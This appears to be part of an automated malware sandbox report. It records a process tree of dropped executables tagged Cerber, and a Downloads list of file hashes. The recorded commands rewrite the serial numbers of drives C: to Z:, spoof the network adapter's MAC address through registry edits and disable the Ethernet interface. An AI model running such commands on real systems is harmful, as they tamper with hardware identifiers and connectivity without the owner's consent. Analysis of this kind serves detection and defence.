                                                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CS >nul 2>&1HJ8UB36R1EJOYEFI
                                                                                                                2⤵
                                                                                                                  PID:4704
                                                                                                                  • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                                    C:\Windows\System32\Tasks\winxsrcsv64.EXE /CS HJ8UB36R1EJOYEFI
                                                                                                                    3⤵
                                                                                                                    • Cerber
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4964
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CA >nul 2>&1LHLCXJZCEEIY3BKH
                                                                                                                  2⤵
                                                                                                                    PID:4324
                                                                                                                    • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                                      C:\Windows\System32\Tasks\winxsrcsv64.EXE /CA LHLCXJZCEEIY3BKH
                                                                                                                      3⤵
                                                                                                                      • Cerber
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4328
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /CSK >nul 2>&100W93EAYU2OGKMBF
                                                                                                                    2⤵
                                                                                                                      PID:1892
                                                                                                                      • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                                        C:\Windows\System32\Tasks\winxsrcsv64.EXE /CSK 00W93EAYU2OGKMBF
                                                                                                                        3⤵
                                                                                                                        • Cerber
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4552
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /PSN >nul 2>&1NA7NV9VODG0DRQPA
                                                                                                                      2⤵
                                                                                                                        PID:640
                                                                                                                        • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                                          C:\Windows\System32\Tasks\winxsrcsv64.EXE /PSN NA7NV9VODG0DRQPA
                                                                                                                          3⤵
                                                                                                                          • Cerber
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2076
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /PAT >nul 2>&1UOBU2XJQMIP0JORC
                                                                                                                        2⤵
                                                                                                                          PID:3152
                                                                                                                          • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                                            C:\Windows\System32\Tasks\winxsrcsv64.EXE /PAT UOBU2XJQMIP0JORC
                                                                                                                            3⤵
                                                                                                                            • Cerber
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4856
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\winxsrcsv64.EXE /PPN >nul 2>&1UE7W2FZTMC8JUM6Y
                                                                                                                          2⤵
                                                                                                                            PID:468
                                                                                                                            • C:\Windows\System32\Tasks\winxsrcsv64.EXE
                                                                                                                              C:\Windows\System32\Tasks\winxsrcsv64.EXE /PPN UE7W2FZTMC8JUM6Y
                                                                                                                              3⤵
                                                                                                                              • Cerber
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4352
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe C: VEDH-H9YP >NUL 2>&1
                                                                                                                            2⤵
                                                                                                                              PID:4832
                                                                                                                              • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                C:\Windows\System32\Tasks\Volumeid64.exe C: VEDH-H9YP
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2312
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe D: VTR5-UEBK >NUL 2>&1
                                                                                                                              2⤵
                                                                                                                                PID:4300
                                                                                                                                • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                  C:\Windows\System32\Tasks\Volumeid64.exe D: VTR5-UEBK
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3080
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe E: A6AH-NU94 >NUL 2>&1
                                                                                                                                2⤵
                                                                                                                                  PID:3408
                                                                                                                                  • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                    C:\Windows\System32\Tasks\Volumeid64.exe E: A6AH-NU94
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2652
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe F: XBLE-KCWH >NUL 2>&1
                                                                                                                                  2⤵
                                                                                                                                    PID:724
                                                                                                                                    • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                      C:\Windows\System32\Tasks\Volumeid64.exe F: XBLE-KCWH
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1548
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe G: RGUP-Y949 >NUL 2>&1
                                                                                                                                    2⤵
                                                                                                                                      PID:3960
                                                                                                                                      • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                        C:\Windows\System32\Tasks\Volumeid64.exe G: RGUP-Y949
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:636
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe H: 3YVP-6PEQ >NUL 2>&1
                                                                                                                                      2⤵
                                                                                                                                        PID:4756
                                                                                                                                        • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                          C:\Windows\System32\Tasks\Volumeid64.exe H: 3YVP-6PEQ
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:3808
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe I: AF79-6MM3 >NUL 2>&1
                                                                                                                                        2⤵
                                                                                                                                          PID:2564
                                                                                                                                          • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                            C:\Windows\System32\Tasks\Volumeid64.exe I: AF79-6MM3
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4436
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe J: VRUR-CUJ0 >NUL 2>&1
                                                                                                                                          2⤵
                                                                                                                                            PID:3648
                                                                                                                                            • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                              C:\Windows\System32\Tasks\Volumeid64.exe J: VRUR-CUJ0
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4296
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe K: B9Y2-9Q1W >NUL 2>&1
                                                                                                                                            2⤵
                                                                                                                                              PID:4776
                                                                                                                                              • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                C:\Windows\System32\Tasks\Volumeid64.exe K: B9Y2-9Q1W
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4980
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe L: EEMM-Q51G >NUL 2>&1
                                                                                                                                              2⤵
                                                                                                                                                PID:2464
                                                                                                                                                • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                  C:\Windows\System32\Tasks\Volumeid64.exe L: EEMM-Q51G
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:1372
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe M: Q40R-973K >NUL 2>&1
                                                                                                                                                2⤵
                                                                                                                                                  PID:4604
                                                                                                                                                  • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                    C:\Windows\System32\Tasks\Volumeid64.exe M: Q40R-973K
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3880
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe N: SEU3-WO9R >NUL 2>&1
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3848
                                                                                                                                                    • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                      C:\Windows\System32\Tasks\Volumeid64.exe N: SEU3-WO9R
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2408
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe O: 5JH4-VCZD >NUL 2>&1
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4492
                                                                                                                                                      • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                        C:\Windows\System32\Tasks\Volumeid64.exe O: 5JH4-VCZD
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:312
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe P: PJLP-04P1 >NUL 2>&1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1216
                                                                                                                                                        • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                          C:\Windows\System32\Tasks\Volumeid64.exe P: PJLP-04P1
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4488
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe Q: PR7I-O8QO >NUL 2>&1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3628
                                                                                                                                                          • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                            C:\Windows\System32\Tasks\Volumeid64.exe Q: PR7I-O8QO
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:3800
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe R: 9SF0-KGCY >NUL 2>&1
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3852
                                                                                                                                                            • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                              C:\Windows\System32\Tasks\Volumeid64.exe R: 9SF0-KGCY
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:3496
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe S: LO8D-CVQI >NUL 2>&1
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4400
                                                                                                                                                              • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                                C:\Windows\System32\Tasks\Volumeid64.exe S: LO8D-CVQI
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4600
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe T: NRXF-4HPX >NUL 2>&1
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1808
                                                                                                                                                                • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                                  C:\Windows\System32\Tasks\Volumeid64.exe T: NRXF-4HPX
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:1760
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe U: NVJ3-ARZU >NUL 2>&1
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:908
                                                                                                                                                                  • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                                    C:\Windows\System32\Tasks\Volumeid64.exe U: NVJ3-ARZU
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2656
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe V: K8LR-PFHN >NUL 2>&1
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2028
                                                                                                                                                                    • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                                      C:\Windows\System32\Tasks\Volumeid64.exe V: K8LR-PFHN
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:2928
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe W: X39Y-JA7D >NUL 2>&1
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2540
                                                                                                                                                                      • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                                        C:\Windows\System32\Tasks\Volumeid64.exe W: X39Y-JA7D
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4532
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe X: D1YY-RC0G >NUL 2>&1
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4180
                                                                                                                                                                        • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                                          C:\Windows\System32\Tasks\Volumeid64.exe X: D1YY-RC0G
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:1220
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe Y: 2WFZ-UMMT >NUL 2>&1
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2480
                                                                                                                                                                          • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                                            C:\Windows\System32\Tasks\Volumeid64.exe Y: 2WFZ-UMMT
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:2508
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\Volumeid64.exe Z: 93R2-0CY4 >NUL 2>&1
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3788
                                                                                                                                                                            • C:\Windows\System32\Tasks\Volumeid64.exe
                                                                                                                                                                              C:\Windows\System32\Tasks\Volumeid64.exe Z: 93R2-0CY4
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:4676
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\mac.bat >nul 2>&1
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:380
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1632
                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                    wmic nic where physicaladapter=true get deviceid
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:4496
                                                                                                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                                                                                                    findstr [0-9]
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2072
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1136
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4416
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4036
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001" /v NetworkAddress /t REG_SZ /d 02-929ACA9A9A9 /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3020
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4764
                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                wmic nic where physicaladapter=true get deviceid
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2892
                                                                                                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                  findstr [0-9]
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5016
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4932
                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1576
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3052
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001" /v PnPCapabilities /t REG_DWORD /d 24 /f
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1864
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:316
                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                              wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:4432
                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                              netsh interface set interface name="Ethernet" disable
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                              PID:1660
                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3940

                                                                                                                                                                                                          Network

                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                          • C:\Windows\System32\Tasks\Volumeid64.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            165KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            81a45f1a91448313b76d2e6d5308aa7a

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            0d615343d5de03da03bce52e11b233093b404083

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

                                                                                                                                                                                                          • C:\Windows\System32\Tasks\mac.bat

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            189dbc488495dbb7b4bc313bbf777116

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            476e49b7383544e7f1e5d4c080e528fd406906d1

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            6b564fd712451bab4446c4beca68635843dfbbeb38a3430b162098e9204ce40b

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            ae6464807f10f4b0ca869c253b7036ae5e7f14b24e8079f8a3481816e4457e036747fdfbbfa26c9f85795f7dcb57f1e839811a327f326799bdc5b5820106c38e

                                                                                                                                                                                                          • C:\Windows\System32\Tasks\winxsrcsv64.EXE

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            379KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            91a31f23f3e50bd0a722e605687aed1e

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            f56fa26aaccdd6eb3f1ea53f06674b01327cd7c4

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            818d6d87d0facc03354bf7b0748467cf61040031248ba8b46045ed9dbe4053d8

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            649ee112c0e9d0c63c199f0dee84332f915af336dd7ad0ff70cbd49cc148c832182ff748c67fe1dee958215ea4a095545d1a93fdeb90fbdeb6f98076b499aab0